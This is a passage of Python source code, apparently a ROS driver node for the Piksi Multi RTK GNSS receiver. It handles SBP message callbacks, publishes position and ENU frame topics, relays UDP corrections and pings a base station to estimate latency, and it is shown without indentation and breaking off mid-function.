from piksi_rtk_msgs.srv import *
from geometry_msgs.msg import (PoseWithCovarianceStamped, PointStamped, PoseWithCovariance, Point, TransformStamped,
Transform)
# Import Piksi SBP library
from sbp.client.drivers.pyserial_driver import PySerialDriver
from sbp.client.drivers.network_drivers import TCPDriver
from sbp.client import Handler, Framer
from sbp.navigation import *
from sbp.logging import *
from sbp.system import *
from sbp.tracking import * # WARNING: tracking is part of the draft messages, could be removed in future releases of libsbp.
from sbp.piksi import * # WARNING: piksi is part of the draft messages, could be removed in future releases of libsbp.
from sbp.observation import *
from sbp.orientation import * # WARNING: orientation messages are still draft messages.
from sbp.settings import *
from zope.interface.exceptions import Invalid
# Piksi Multi features an IMU
from sbp.imu import *
# Piksi Multi features a Magnetometer Bosh bmm150 : https://www.bosch-sensortec.com/bst/products/all_products/bmm150
from sbp.mag import SBP_MSG_MAG_RAW, MsgMagRaw
# At the moment importing 'sbp.version' module causes ValueError: Cannot find the version number!
# import sbp.version
# networking stuff
import UdpHelpers
import time
import subprocess
import re
import threading
import sys
import collections
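# --- Illustrative sketch (not part of the original driver) ---
# PiksiMulti.geodetic_to_ecef() below implements the standard WGS-84 geodetic
# to ECEF conversion. The standalone helper here restates the same formula so
# it can be sanity-checked without a ROS environment; the function name and
# the local constants belong to this sketch only.
def _wgs84_geodetic_to_ecef_sketch(lat_deg, lon_deg, alt_m):
    """Return (x, y, z) ECEF coordinates in metres for a WGS-84 geodetic position."""
    a = 6378137.0                # semi-major axis [m]
    e2 = 6.69437999014e-3        # first eccentricity squared
    lat = math.radians(lat_deg)
    lon = math.radians(lon_deg)
    n = a / math.sqrt(1.0 - e2 * math.sin(lat) ** 2)  # prime vertical radius of curvature
    x = (n + alt_m) * math.cos(lat) * math.cos(lon)
    y = (n + alt_m) * math.cos(lat) * math.sin(lon)
    z = (n * (1.0 - e2) + alt_m) * math.sin(lat)
    return x, y, z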
class PiksiMulti:
LIB_SBP_VERSION_MULTI = '2.4.1' # SBP version used for Piksi Multi.
# Geodetic Constants.
kSemimajorAxis = 6378137
kSemiminorAxis = 6356752.3142
kFirstEccentricitySquared = 6.69437999014 * 0.001
kSecondEccentricitySquared = 6.73949674228 * 0.001
kFlattening = 1 / 298.257223563
def __init__(self):
# Print info.
rospy.init_node('piksi')
rospy.sleep(0.5) # Wait for a while for init to complete before printing.
rospy.loginfo(rospy.get_name() + " start")
# Check SBP version.
if 'sbp.version' in sys.modules:
installed_sbp_version = sbp.version.get_git_version()
else:
installed_sbp_version = self.get_installed_sbp_version()
rospy.loginfo("libsbp version currently used: " + installed_sbp_version)
# Check for correct SBP library version dependent on Piksi device.
if PiksiMulti.LIB_SBP_VERSION_MULTI != installed_sbp_version:
rospy.logwarn("Lib SBP version in usage (%s) is different than the one used to test this driver (%s)!\n"
"Please run the install script: 'install/install_piksi_multi.sh'" % (
installed_sbp_version, PiksiMulti.LIB_SBP_VERSION_MULTI))
# Open a connection to SwiftNav receiver.
interface = rospy.get_param('~interface', 'serial')
if interface == 'tcp':
tcp_addr = rospy.get_param('~tcp_addr', '192.168.0.222')
tcp_port = rospy.get_param('~tcp_port', 55555)
try:
self.driver = TCPDriver(tcp_addr, tcp_port)
except SystemExit:
rospy.logerr("Unable to open TCP connection %s:%s", (tcp_addr, tcp_port))
raise
else:
serial_port = rospy.get_param('~serial_port', '/dev/ttyUSB0')
baud_rate = rospy.get_param('~baud_rate', 230400)
try:
self.driver = PySerialDriver(serial_port, baud=baud_rate)
except SystemExit:
rospy.logerr("Swift receiver not found on serial port '%s'", serial_port)
raise
# Create a handler to connect Piksi driver to callbacks.
self.driver_verbose = rospy.get_param('~driver_verbose', True)
self.framer = Framer(self.driver.read, self.driver.write, verbose=self.driver_verbose)
self.handler = Handler(self.framer)
self.debug_mode = rospy.get_param('~debug_mode', False)
if self.debug_mode:
rospy.loginfo("Swift driver started in debug mode, every available topic will be published.")
# Debugging parameters.
debug_delayed_corrections_stack_size = rospy.get_param('~debug_delayed_corrections_stack_size', 10)
# self.received_corrections_fifo_stack = collections.deque([], debug_delayed_corrections_stack_size)
# rospy.loginfo("Debug mode: delayed corrections stack size: %d." % debug_delayed_corrections_stack_size)
else:
rospy.loginfo("Swift driver started in normal mode.")
# Corrections over WiFi settings.
self.base_station_mode = rospy.get_param('~base_station_mode', False)
self.udp_broadcast_addr = rospy.get_param('~broadcast_addr', '255.255.255.255')
self.udp_port = rospy.get_param('~broadcast_port', 26078)
self.base_station_ip_for_latency_estimation = rospy.get_param(
'~base_station_ip_for_latency_estimation',
'192.168.0.1')
self.multicaster = []
self.multicast_recv = []
# Navsatfix settings.
self.var_spp = rospy.get_param('~var_spp', [25.0, 25.0, 64.0])
self.var_rtk_float = rospy.get_param('~var_rtk_float', [25.0, 25.0, 64.0])
self.var_rtk_fix = rospy.get_param('~var_rtk_fix', [0.0049, 0.0049, 0.01])
self.var_spp_sbas = rospy.get_param('~var_spp_sbas', [1.0, 1.0, 1.0])
self.navsatfix_frame_id = rospy.get_param('~navsatfix_frame_id', 'gps')
# Local ENU frame settings.
self.origin_enu_set = False
self.latitude0 = 0.0
self.longitude0 = 0.0
self.altitude0 = 0.0
self.initial_ecef_x = 0.0
self.initial_ecef_y = 0.0
self.initial_ecef_z = 0.0
self.ecef_to_ned_matrix = np.eye(3)
self.enu_frame_id = rospy.get_param('~enu_frame_id', 'enu')
self.transform_child_frame_id = rospy.get_param('~transform_child_frame_id', 'gps_receiver')
if rospy.has_param('~latitude0_deg') and rospy.has_param('~longitude0_deg') and rospy.has_param(
'~altitude0'):
latitude0 = rospy.get_param('~latitude0_deg')
longitude0 = rospy.get_param('~longitude0_deg')
altitude0 = rospy.get_param('~altitude0')
# Set origin ENU frame to coordinate specified by rosparam.
self.init_geodetic_reference(latitude0, longitude0, altitude0)
rospy.loginfo("Origin ENU frame set by rosparam.")
# Watchdog timer info
self.watchdog_time = rospy.get_rostime()
self.messages_started = False
# Other parameters.
self.publish_raw_imu_and_mag = rospy.get_param('~publish_raw_imu_and_mag', False)
# Advertise topics and services.
self.publishers = self.advertise_topics()
self.service_servers = self.advertise_services()
# Create topic callbacks.
self.create_topic_callbacks()
# Init messages with "memory".
self.receiver_state_msg = self.init_receiver_state_msg()
self.num_wifi_corrections = self.init_num_corrections_msg()
# Corrections over wifi message, if we are not the base station.
if not self.base_station_mode:
# Start new thread to periodically ping base station.
threading.Thread(target=self.ping_base_station_over_wifi).start()
self.handler.start()
# Handle firmware settings services
self.last_section_setting_read = []
self.last_setting_read = []
self.last_value_read = []
# Only have start-up reset in base station mode
if self.base_station_mode:
# Things have 30 seconds to start or we will kill node
rospy.Timer(rospy.Duration(30), self.cb_watchdog, True)
# Spin.
rospy.spin()
def create_topic_callbacks(self):
# Callbacks from SBP messages (cb_sbp_*) implemented "manually".
self.handler.add_callback(self.cb_sbp_glonass_biases, msg_type=SBP_MSG_GLO_BIASES)
self.handler.add_callback(self.cb_sbp_heartbeat, msg_type=SBP_MSG_HEARTBEAT)
self.handler.add_callback(self.cb_sbp_pos_llh, msg_type=SBP_MSG_POS_LLH)
self.handler.add_callback(self.cb_sbp_base_pos_ecef, msg_type=SBP_MSG_BASE_POS_ECEF)
self.handler.add_callback(self.cb_sbp_obs, msg_type=SBP_MSG_OBS)
self.handler.add_callback(self.cb_sbp_settings_read_by_index_resp, msg_type=SBP_MSG_SETTINGS_READ_BY_INDEX_RESP)
self.handler.add_callback(self.cb_settings_read_resp, msg_type=SBP_MSG_SETTINGS_READ_RESP)
self.handler.add_callback(self.cb_sbp_measurement_state, msg_type=SBP_MSG_MEASUREMENT_STATE)
self.handler.add_callback(self.cb_sbp_uart_state, msg_type=SBP_MSG_UART_STATE)
# Callbacks generated "automatically".
self.init_callback('baseline_ecef_multi', BaselineEcef,
SBP_MSG_BASELINE_ECEF, MsgBaselineECEF,
'tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags')
self.init_callback('baseline_ned_multi', BaselineNed,
SBP_MSG_BASELINE_NED, MsgBaselineNED,
'tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy', 'n_sats', 'flags')
self.init_callback('dops_multi', DopsMulti,
SBP_MSG_DOPS, MsgDops, 'tow', 'gdop', 'pdop', 'tdop', 'hdop', 'vdop', 'flags')
self.init_callback('gps_time_multi', GpsTimeMulti,
SBP_MSG_GPS_TIME, MsgGPSTime, 'wn', 'tow', 'ns_residual', 'flags')
self.init_callback('utc_time_multi', UtcTimeMulti,
SBP_MSG_UTC_TIME, MsgUtcTime,
'flags', 'tow', 'year', 'month', 'day', 'hours', 'minutes', 'seconds', 'ns')
self.init_callback('pos_ecef_multi', PosEcef,
SBP_MSG_POS_ECEF, MsgPosECEF,
'tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags')
self.init_callback('vel_ecef', VelEcef,
SBP_MSG_VEL_ECEF, MsgVelECEF,
'tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags')
self.init_callback('vel_ned', VelNed,
SBP_MSG_VEL_NED, MsgVelNED,
'tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy', 'n_sats', 'flags')
self.init_callback('log', Log,
SBP_MSG_LOG, MsgLog, 'level', 'text')
self.init_callback('baseline_heading', BaselineHeading,
SBP_MSG_BASELINE_HEADING, MsgBaselineHeading, 'tow', 'heading', 'n_sats', 'flags')
self.init_callback('age_of_corrections', AgeOfCorrections,
SBP_MSG_AGE_CORRECTIONS, MsgAgeCorrections, 'tow', 'age')
self.init_callback('device_monitor', DeviceMonitor_V2_3_15,
SBP_MSG_DEVICE_MONITOR, MsgDeviceMonitor, 'dev_vin', 'cpu_vint', 'cpu_vaux',
'cpu_temperature', 'fe_temperature')
# Raw IMU and Magnetometer measurements.
if self.publish_raw_imu_and_mag:
self.init_callback('imu_raw', ImuRawMulti,
SBP_MSG_IMU_RAW, MsgImuRaw,
'tow', 'tow_f', 'acc_x', 'acc_y', 'acc_z', 'gyr_x', 'gyr_y', 'gyr_z')
self.init_callback('mag_raw', MagRaw,
SBP_MSG_MAG_RAW, MsgMagRaw, 'tow', 'tow_f', 'mag_x', 'mag_y', 'mag_z')
# Only if debug mode
if self.debug_mode:
self.handler.add_callback(self.cb_sbp_base_pos_llh, msg_type=SBP_MSG_BASE_POS_LLH)
# do not publish llh message, prefer publishing directly navsatfix_spp or navsatfix_rtk_fix.
# self.init_callback('pos_llh', PosLlh,
# SBP_MSG_POS_LLH, MsgPosLLH,
# 'tow', 'lat', 'lon', 'height', 'h_accuracy', 'v_accuracy', 'n_sats', 'flags')
# Relay "corrections" messages via UDP if in base station mode.
if self.base_station_mode:
rospy.loginfo("Starting device in Base Station Mode")
self.multicaster = UdpHelpers.SbpUdpMulticaster(self.udp_broadcast_addr, self.udp_port)
else:
rospy.loginfo("Starting device in Rover Mode")
self.multicast_recv = UdpHelpers.SbpUdpMulticastReceiver(self.udp_port, self.multicast_callback)
def init_num_corrections_msg(self):
num_wifi_corrections = InfoWifiCorrections()
num_wifi_corrections.header.seq = 0
num_wifi_corrections.received_corrections = 0
num_wifi_corrections.latency = -1
return num_wifi_corrections
def init_receiver_state_msg(self):
receiver_state_msg = ReceiverState_V2_4_1()
receiver_state_msg.num_sat = 0 # Unknown.
receiver_state_msg.rtk_mode_fix = False # Unknown.
receiver_state_msg.sat = [] # Unknown.
receiver_state_msg.cn0 = [] # Unknown.
receiver_state_msg.system_error = 255 # Unknown.
receiver_state_msg.io_error = 255 # Unknown.
receiver_state_msg.swift_nap_error = 255 # Unknown.
receiver_state_msg.external_antenna_present = 255 # Unknown.
receiver_state_msg.num_gps_sat = 0 # Unknown.
receiver_state_msg.cn0_gps = [] # Unknown.
receiver_state_msg.num_sbas_sat = 0 # Unknown.
receiver_state_msg.cn0_sbas = [] # Unknown.
receiver_state_msg.num_glonass_sat = 0 # Unknown.
receiver_state_msg.cn0_glonass = [] # Unknown.
receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_UNKNOWN
return receiver_state_msg
def advertise_topics(self):
"""
Advertise topics.
:return: python dictionary, with topic names used as keys and publishers as values.
"""
publishers = {}
publishers['rtk_fix'] = rospy.Publisher(rospy.get_name() + '/navsatfix_rtk_fix',
NavSatFix, queue_size=10)
publishers['spp'] = rospy.Publisher(rospy.get_name() + '/navsatfix_spp',
NavSatFix, queue_size=10)
publishers['best_fix'] = rospy.Publisher(rospy.get_name() + '/navsatfix_best_fix',
NavSatFix, queue_size=10)
publishers['heartbeat'] = rospy.Publisher(rospy.get_name() + '/heartbeat',
Heartbeat, queue_size=10)
publishers['measurement_state'] = rospy.Publisher(rospy.get_name() + '/measurement_state',
piksi_rtk_msgs.msg.MeasurementState_V2_4_1, queue_size=10)
publishers['receiver_state'] = rospy.Publisher(rospy.get_name() + '/debug/receiver_state',
ReceiverState_V2_4_1, queue_size=10)
# Do not publish llh message, prefer publishing directly navsatfix_spp or navsatfix_rtk_fix.
# publishers['pos_llh'] = rospy.Publisher(rospy.get_name() + '/pos_llh',
# PosLlh, queue_size=10)
publishers['vel_ned'] = rospy.Publisher(rospy.get_name() + '/vel_ned',
VelNed, queue_size=10)
publishers['log'] = rospy.Publisher(rospy.get_name() + '/log',
Log, queue_size=10)
publishers['uart_state'] = rospy.Publisher(rospy.get_name() + '/uart_state',
UartState_V2_3_15, queue_size=10)
publishers['device_monitor'] = rospy.Publisher(rospy.get_name() + '/device_monitor',
DeviceMonitor_V2_3_15, queue_size=10)
# Points in ENU frame.
publishers['enu_pose_fix'] = rospy.Publisher(rospy.get_name() + '/enu_pose_fix',
PoseWithCovarianceStamped, queue_size=10)
publishers['enu_point_fix'] = rospy.Publisher(rospy.get_name() + '/enu_point_fix',
PointStamped, queue_size=10)
publishers['enu_transform_fix'] = rospy.Publisher(rospy.get_name() + '/enu_transform_fix',
TransformStamped, queue_size=10)
publishers['enu_pose_spp'] = rospy.Publisher(rospy.get_name() + '/enu_pose_spp',
PoseWithCovarianceStamped, queue_size=10)
publishers['enu_point_spp'] = rospy.Publisher(rospy.get_name() + '/enu_point_spp',
PointStamped, queue_size=10)
publishers['enu_transform_spp'] = rospy.Publisher(rospy.get_name() + '/enu_transform_spp',
TransformStamped, queue_size=10)
publishers['gps_time_multi'] = rospy.Publisher(rospy.get_name() + '/gps_time',
GpsTimeMulti, queue_size=10)
publishers['baseline_ned_multi'] = rospy.Publisher(rospy.get_name() + '/baseline_ned',
BaselineNed, queue_size=10)
publishers['utc_time_multi'] = rospy.Publisher(rospy.get_name() + '/utc_time',
UtcTimeMulti, queue_size=10)
publishers['baseline_heading'] = rospy.Publisher(rospy.get_name() + '/baseline_heading',
BaselineHeading, queue_size=10)
publishers['age_of_corrections'] = rospy.Publisher(rospy.get_name() + '/age_of_corrections',
AgeOfCorrections, queue_size=10)
publishers['enu_pose_best_fix'] = rospy.Publisher(rospy.get_name() + '/enu_pose_best_fix',
PoseWithCovarianceStamped, queue_size=10)
# Raw IMU and Magnetometer measurements.
if self.publish_raw_imu_and_mag:
publishers['imu_raw'] = rospy.Publisher(rospy.get_name() + '/imu_raw',
ImuRawMulti, queue_size=10)
publishers['mag_raw'] = rospy.Publisher(rospy.get_name() + '/mag_raw',
MagRaw, queue_size=10)
# Topics published only if in "debug mode".
if self.debug_mode:
publishers['rtk_float'] = rospy.Publisher(rospy.get_name() + '/navsatfix_rtk_float',
NavSatFix, queue_size=10)
publishers['vel_ecef'] = rospy.Publisher(rospy.get_name() + '/vel_ecef',
VelEcef, queue_size=10)
publishers['enu_pose_float'] = rospy.Publisher(rospy.get_name() + '/enu_pose_float',
PoseWithCovarianceStamped, queue_size=10)
publishers['enu_point_float'] = rospy.Publisher(rospy.get_name() + '/enu_point_float',
PointStamped, queue_size=10)
publishers['enu_transform_float'] = rospy.Publisher(rospy.get_name() + '/enu_transform_float',
TransformStamped, queue_size=10)
publishers['baseline_ecef_multi'] = rospy.Publisher(rospy.get_name() + '/baseline_ecef',
BaselineEcef, queue_size=10)
publishers['dops_multi'] = rospy.Publisher(rospy.get_name() + '/dops',
DopsMulti, queue_size=10)
publishers['pos_ecef_multi'] = rospy.Publisher(rospy.get_name() + '/pos_ecef',
PosEcef, queue_size=10)
publishers['observation'] = rospy.Publisher(rospy.get_name() + '/observation',
Observation, queue_size=10)
publishers['base_pos_llh'] = rospy.Publisher(rospy.get_name() + '/base_pos_llh',
BasePosLlh, queue_size=10)
publishers['base_pos_ecef'] = rospy.Publisher(rospy.get_name() + '/base_pos_ecef',
BasePosEcef, queue_size=10)
if not self.base_station_mode:
publishers['wifi_corrections'] = rospy.Publisher(rospy.get_name() + '/debug/wifi_corrections',
InfoWifiCorrections, queue_size=10)
return publishers
def advertise_services(self):
"""
Advertise service servers.
:return: python dictionary, with service names used as keys and servers as values.
"""
servers = {}
servers['reset_piksi'] = rospy.Service(rospy.get_name() +
'/reset_piksi',
std_srvs.srv.SetBool,
self.reset_piksi_service_callback)
servers['settings_write'] = rospy.Service(rospy.get_name() +
'/settings_write',
SettingsWrite,
self.settings_write_server)
servers['settings_read_req'] = rospy.Service(rospy.get_name() +
'/settings_read_req',
SettingsReadReq,
self.settings_read_req_server)
servers['settings_read_resp'] = rospy.Service(rospy.get_name() +
'/settings_read_resp',
SettingsReadResp,
self.settings_read_resp_server)
servers['settings_save'] = rospy.Service(rospy.get_name() +
'/settings_save',
std_srvs.srv.SetBool,
self.settings_save_callback)
return servers
def ping_base_station_over_wifi(self):
"""
Ping base station periodically without blocking the driver.
"""
ping_deadline_seconds = 3
interval_between_pings_seconds = 5
while not rospy.is_shutdown():
# Send ping command.
command = ["ping",
"-w", str(ping_deadline_seconds), # deadline before stopping attempt
"-c", "1", # number of pings to send
self.base_station_ip_for_latency_estimation]
ping = subprocess.Popen(command, stdout=subprocess.PIPE)
out, error = ping.communicate()
# Search for 'min/avg/max/mdev' round trip delay time (rtt) numbers.
matcher = re.compile(r"(\d+\.\d+)/(\d+\.\d+)/(\d+\.\d+)/(\d+\.\d+)")
if matcher.search(out) is None:
# No ping response within ping_deadline_seconds.
# In python write and read operations on built-in type are atomic,
# there's no need to use mutex.
self.num_wifi_corrections.latency = -1
else:
groups_rtt = matcher.search(out).groups()
avg_rtt = groups_rtt[1]
# In python write and read operations on built-in type are atomic,
# there's no need to use mutex.
self.num_wifi_corrections.latency = float(avg_rtt)
time.sleep(interval_between_pings_seconds)
def make_callback(self, sbp_type, ros_message, pub, attrs):
"""
Dynamic generator for callback functions for message types from
the SBP library.
Inputs: 'sbp_type' name of SBP message type.
'ros_message' ROS message type with SBP format.
'pub' ROS publisher for ros_message.
'attrs' array of attributes in SBP/ROS message.
Returns: callback function 'callback'.
"""
def callback(msg, **metadata):
sbp_message = sbp_type(msg)
ros_message.header.stamp = rospy.Time.now()
for attr in attrs:
if attr == 'flags':
# Least significant three bits of flags indicate status.
if (sbp_message.flags & 0x07) == 0:
return # Invalid message, do not publish it.
setattr(ros_message, attr, getattr(sbp_message, attr))
pub.publish(ros_message)
return callback
def init_callback(self, topic_name, ros_datatype, sbp_msg_type, callback_data_type, *attrs):
"""
Initializes the callback function for an SBP
message type.
Inputs: 'topic_name' name of ROS topic for publisher
'ros_datatype' ROS custom message type
'sbp_msg_type' name of SBP message type for callback function
'callback_data_type' name of SBP message type for SBP library
'*attrs' array of attributes in ROS/SBP message
"""
# Check that required topic has been advertised.
if topic_name in self.publishers:
ros_message = ros_datatype()
# Add callback function.
pub = self.publishers[topic_name]
callback_function = self.make_callback(callback_data_type, ros_message, pub, attrs)
self.handler.add_callback(callback_function, msg_type=sbp_msg_type)
def cb_sbp_obs(self, msg_raw, **metadata):
if self.debug_mode:
msg = MsgObs(msg_raw)
obs_msg = Observation()
obs_msg.header.stamp = rospy.Time.now()
obs_msg.tow = msg.header.t.tow
obs_msg.ns_residual = msg.header.t.ns_residual
obs_msg.wn = msg.header.t.wn
obs_msg.n_obs = msg.header.n_obs
obs_msg.P = []
obs_msg.L_i = []
obs_msg.L_f = []
obs_msg.D_i = []
obs_msg.D_f = []
obs_msg.cn0 = []
obs_msg.lock = []
obs_msg.flags = []
obs_msg.sid_sat = []
obs_msg.sid_code = []
for observation in msg.obs:
obs_msg.P.append(observation.P)
obs_msg.L_i.append(observation.L.i)
obs_msg.L_f.append(observation.L.f)
obs_msg.D_i.append(observation.D.i)
obs_msg.D_f.append(observation.D.f)
obs_msg.cn0.append(observation.cn0)
obs_msg.lock.append(observation.lock)
obs_msg.flags.append(observation.flags)
obs_msg.sid_sat.append(observation.sid.sat)
obs_msg.sid_code.append(observation.sid.code)
self.publishers['observation'].publish(obs_msg)
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_sbp_base_pos_llh(self, msg_raw, **metadata):
if self.debug_mode:
msg = MsgBasePosLLH(msg_raw)
pose_llh_msg = BasePosLlh()
pose_llh_msg.header.stamp = rospy.Time.now()
pose_llh_msg.lat = msg.lat
pose_llh_msg.lon = msg.lon
pose_llh_msg.height = msg.height
self.publishers['base_pos_llh'].publish(pose_llh_msg)
def cb_sbp_base_pos_ecef(self, msg_raw, **metadata):
if self.debug_mode:
msg = MsgBasePosECEF(msg_raw)
pose_ecef_msg = BasePosEcef()
pose_ecef_msg.header.stamp = rospy.Time.now()
pose_ecef_msg.x = msg.x
pose_ecef_msg.y = msg.y
pose_ecef_msg.z = msg.z
self.publishers['base_pos_ecef'].publish(pose_ecef_msg)
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_sbp_uart_state(self, msg_raw, **metadata):
msg = MsgUartState(msg_raw)
uart_state_msg = UartState_V2_3_15()
uart_state_msg.latency_avg = msg.latency.avg
uart_state_msg.latency_lmin = msg.latency.lmin
uart_state_msg.latency_lmax = msg.latency.lmax
uart_state_msg.latency_current = msg.latency.current
uart_state_msg.obs_period_avg = msg.obs_period.avg
uart_state_msg.obs_period_pmin = msg.obs_period.pmin
uart_state_msg.obs_period_pmax = msg.obs_period.pmax
uart_state_msg.obs_period_current = msg.obs_period.current
self.publishers['uart_state'].publish(uart_state_msg)
def multicast_callback(self, msg, **metadata):
if self.framer:
# TODO (marco-tranzatto) probably next commented part should be completely deleted.
# if self.debug_mode:
# # Test network delay by storing a fixed number of correction messages and retrieving the oldest one.
# # TODO (marco-tranzatto) check if we need to store even **metadata or not
# # self.received_corrections_fifo_stack.append([msg, **metadata])
# # oldest_correction = self.received_corrections_fifo_stack.popleft()
# self.received_corrections_fifo_stack.append(msg)
# oldest_correction = self.received_corrections_fifo_stack.popleft()
# self.framer(oldest_correction, **metadata)
# else:
# self.framer(msg, **metadata)
self.framer(msg, **metadata)
# Publish debug message about wifi corrections, if enabled.
self.num_wifi_corrections.header.seq += 1
self.num_wifi_corrections.header.stamp = rospy.Time.now()
self.num_wifi_corrections.received_corrections += 1
if not self.base_station_mode:
self.publishers['wifi_corrections'].publish(self.num_wifi_corrections)
else:
rospy.logwarn("Received external SBP msg, but Piksi not connected.")
def cb_sbp_glonass_biases(self, msg_raw, **metadata):
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_watchdog(self, event):
if ((rospy.get_rostime() - self.watchdog_time).to_sec() > 10.0):
rospy.logwarn("Heartbeat failed, watchdog triggered.")
if self.base_station_mode:
rospy.signal_shutdown("Watchdog triggered, was gps disconnected?")
def cb_sbp_pos_llh(self, msg_raw, **metadata):
msg = MsgPosLLH(msg_raw)
# Invalid messages.
if msg.flags == PosLlhMulti.FIX_MODE_INVALID:
return
# SPP GPS messages.
elif msg.flags == PosLlhMulti.FIX_MODE_SPP:
self.publish_spp(msg.lat, msg.lon, msg.height, self.var_spp, NavSatStatus.STATUS_FIX)
# Differential GNSS (DGNSS)
elif msg.flags == PosLlhMulti.FIX_MODE_DGNSS:
rospy.logwarn(
"[cb_sbp_pos_llh]: case FIX_MODE_DGNSS was not implemented yet." +
"Contact the package/repository maintainers.")
# TODO what to do here?
return
# RTK messages.
elif msg.flags == PosLlhMulti.FIX_MODE_FLOAT_RTK:
# For now publish RTK float only in debug mode.
if self.debug_mode:
self.publish_rtk_float(msg.lat, msg.lon, msg.height)
elif msg.flags == PosLlhMulti.FIX_MODE_FIX_RTK:
# Use first RTK fix to set origin ENU frame, if it was not set by rosparam.
if not self.origin_enu_set:
self.init_geodetic_reference(msg.lat, msg.lon, msg.height)
self.publish_rtk_fix(msg.lat, msg.lon, msg.height)
# Dead reckoning
elif msg.flags == PosLlhMulti.FIX_MODE_DEAD_RECKONING:
rospy.logwarn(
"[cb_sbp_pos_llh]: case FIX_MODE_DEAD_RECKONING was not implemented yet." +
"Contact the package/repository maintainers.")
return
# SBAS Position
elif msg.flags == PosLlhMulti.FIX_MODE_SBAS:
self.publish_spp(msg.lat, msg.lon, msg.height, self.var_spp_sbas, NavSatStatus.STATUS_SBAS_FIX)
else:
rospy.logerr(
"[cb_sbp_pos_llh]: Unknown case, you found a bug!" +
"Contact the package/repository maintainers." +
"Report: 'msg.flags = %d'" % (msg.flags))
return
# Update debug msg and publish.
self.receiver_state_msg.rtk_mode_fix = (msg.flags == PosLlhMulti.FIX_MODE_FIX_RTK)
if msg.flags == PosLlhMulti.FIX_MODE_INVALID:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_INVALID
elif msg.flags == PosLlhMulti.FIX_MODE_SPP:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_SPP
elif msg.flags == PosLlhMulti.FIX_MODE_DGNSS:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_DGNSS
elif msg.flags == PosLlhMulti.FIX_MODE_FLOAT_RTK:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_FLOAT_RTK
elif msg.flags == PosLlhMulti.FIX_MODE_FIX_RTK:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_FIXED_RTK
elif msg.flags == PosLlhMulti.FIX_MODE_DEAD_RECKONING:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_DEAD_RECKONING
elif msg.flags == PosLlhMulti.FIX_MODE_SBAS:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_SBAS
else:
self.receiver_state_msg.fix_mode = ReceiverState_V2_4_1.STR_FIX_MODE_UNKNOWN
self.publish_receiver_state_msg()
def publish_spp(self, latitude, longitude, height, variance, navsatstatus_fix):
self.publish_wgs84_point(latitude, longitude, height, variance, navsatstatus_fix,
self.publishers['spp'],
self.publishers['enu_pose_spp'], self.publishers['enu_point_spp'],
self.publishers['enu_transform_spp'], self.publishers['best_fix'],
self.publishers['enu_pose_best_fix'])
def publish_rtk_float(self, latitude, longitude, height):
self.publish_wgs84_point(latitude, longitude, height, self.var_rtk_float, NavSatStatus.STATUS_GBAS_FIX,
self.publishers['rtk_float'],
self.publishers['enu_pose_float'], self.publishers['enu_point_float'],
self.publishers['enu_transform_float'], self.publishers['best_fix'],
self.publishers['enu_pose_best_fix'])
def publish_rtk_fix(self, latitude, longitude, height):
self.publish_wgs84_point(latitude, longitude, height, self.var_rtk_fix, NavSatStatus.STATUS_GBAS_FIX,
self.publishers['rtk_fix'],
self.publishers['enu_pose_fix'], self.publishers['enu_point_fix'],
self.publishers['enu_transform_fix'], self.publishers['best_fix'],
self.publishers['enu_pose_best_fix'])
def publish_wgs84_point(self, latitude, longitude, height, variance, navsat_status, pub_navsatfix, pub_pose,
pub_point, pub_transform, pub_navsatfix_best_pose, pub_pose_best_fix):
# Navsatfix message.
navsatfix_msg = NavSatFix()
navsatfix_msg.header.stamp = rospy.Time.now()
navsatfix_msg.header.frame_id = self.navsatfix_frame_id
navsatfix_msg.position_covariance_type = NavSatFix.COVARIANCE_TYPE_APPROXIMATED
navsatfix_msg.status.service = NavSatStatus.SERVICE_GPS
navsatfix_msg.latitude = latitude
navsatfix_msg.longitude = longitude
navsatfix_msg.altitude = height
navsatfix_msg.status.status = navsat_status
navsatfix_msg.position_covariance = [variance[0], 0, 0,
0, variance[1], 0,
0, 0, variance[2]]
# Local Enu coordinate.
(east, north, up) = self.geodetic_to_enu(latitude, longitude, height)
# Pose message.
pose_msg = PoseWithCovarianceStamped()
pose_msg.header.stamp = navsatfix_msg.header.stamp
pose_msg.header.frame_id = self.enu_frame_id
pose_msg.pose = self.enu_to_pose_msg(east, north, up, variance)
# Point message.
point_msg = PointStamped()
point_msg.header.stamp = navsatfix_msg.header.stamp
point_msg.header.frame_id = self.enu_frame_id
point_msg.point = self.enu_to_point_msg(east, north, up)
# Transform message.
transform_msg = TransformStamped()
transform_msg.header.stamp = navsatfix_msg.header.stamp
transform_msg.header.frame_id = self.enu_frame_id
transform_msg.child_frame_id = self.transform_child_frame_id
transform_msg.transform = self.enu_to_transform_msg(east, north, up)
# Publish.
pub_navsatfix.publish(navsatfix_msg)
pub_pose.publish(pose_msg)
pub_point.publish(point_msg)
pub_transform.publish(transform_msg)
pub_navsatfix_best_pose.publish(navsatfix_msg)
pub_pose_best_fix.publish(pose_msg)
def cb_sbp_heartbeat(self, msg_raw, **metadata):
msg = MsgHeartbeat(msg_raw)
# Let watchdog know messages are still arriving
self.watchdog_time = rospy.get_rostime()
# Start watchdog with 10 second timeout to ensure we keep getting gps
if not self.messages_started:
self.messages_started = True
rospy.Timer(rospy.Duration(10), self.cb_watchdog)
heartbeat_msg = Heartbeat()
heartbeat_msg.header.stamp = rospy.Time.now()
heartbeat_msg.system_error = msg.flags & 0x01
heartbeat_msg.io_error = msg.flags & 0x02
heartbeat_msg.swift_nap_error = msg.flags & 0x04
heartbeat_msg.sbp_minor_version = (msg.flags & 0xFF00) >> 8
